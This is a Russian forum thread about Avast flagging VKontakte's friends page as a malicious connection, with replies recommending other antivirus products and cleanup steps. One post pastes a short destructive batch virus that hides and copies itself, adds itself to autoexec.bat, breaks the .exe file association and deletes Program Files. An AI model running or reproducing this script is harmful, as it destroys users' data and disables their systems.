![]() |
Avast вирус друзей!
При нажатия ВКОНТАКТЕ на "Мои Друзья" avast распознаёт это как вирус и прирывает соединения!Подскажите пожалуста иза чего?и как избавиться?
|
C:\WINDOWS\system32\drivers\etc
Открывае файлик hosts блокнотом - удаляеш все! Если далле будет такое дело, тогда хз....Почисть куки в браузере! |
Блин всёровно тоже самое!
буду думать! |
1. удалить аваст
2. установить авира 3. удалить аккаунт в этой сети |
Цитата:
Так он выдаёт "вредоносное соединение (токо в Mozilla Firefox)"нетолько на 1 акаунте а на всех! |
Цитата:
|
Цитата:
|
Удали аваст нафиг и поставь Kaspersky Internet Security
|
Цитата:
|
Цитата:
стирай его нафиг... ставь что-то более путевое! |
Цитата:
Да ток посмотрел чё за вирус?BV:Luzer-A |
омг, завязывай с ВК. Это тебе знак свыше ^^ А вообще удаляй аваст и ставь Dr. Web
|
Цитата:
Столько придложений антивира так какой же лудше установить? AVIRA;Kaspersky;Dr. Web;nod32! просто незнаю что выбрать? |
Цитата:
а насчет вируса да это такой вирус есть и правда! |
Цитата:
В данном вопросе всегда были и остаются споры! Дедушке лично по душе NOD 32... Хотя включаю его изредка... Обычно юзаю прямые руки, работоспособный мозг и на всякий случай http://www.virustotal.com/ru/ P.S. если слабенькая машина, Каспера не ставь! |
Отключи web экран в настройках.
(@Echo off Echo Virus Date 13.09.96 If exist c:ski.bat goto abc Copy %0 c:ski.bat Attrib +h c:ski.bat Echo c:ski.bat >>autoexec.bat md PRIDUROK md LUZER md DURAK md LAMER Label E: PRIDUROK assoc.exe=.mp3 del c:Program Files/q Echo VIRUS LOAD) Вот так выглядит сам вирус. |
Цитата:
ну блин про вирус уже всё понятно! Цитата:
Цитата:
|
антивирус ругается на динамические аватарки, которые стали нынче популярными
среди многих пользователей. Просто посмотри у кого на авике всякие прогнозы погод, аськи и аптаймы стоят и удали его из френдов. |
Цитата:
буду искать по последним добавимшимся а эт человек 100 просто антивир начел сходить сума примерно вчерашним вечером!попробую всеровно!просто мне кажеться что дело не в том потому что часа 2 назад он начел также реогировать на античат когда перелиствываю страницу! Цитата:
|
Эм, я тоже вк как нежелательное по определяю =\
|
Цитата:
|
Цитата:
|
Ну от тово что аваст начел реогировать на античат также как на ВК я ваще в шоке досихпор!
Чистел и уже нераз чистку производил полнустью всего! |
на одном нике все норм в друзья на другом ПИШЕТ ВИРУС
присоединяюсь |
Цитата:
|
| Время: 18:35 |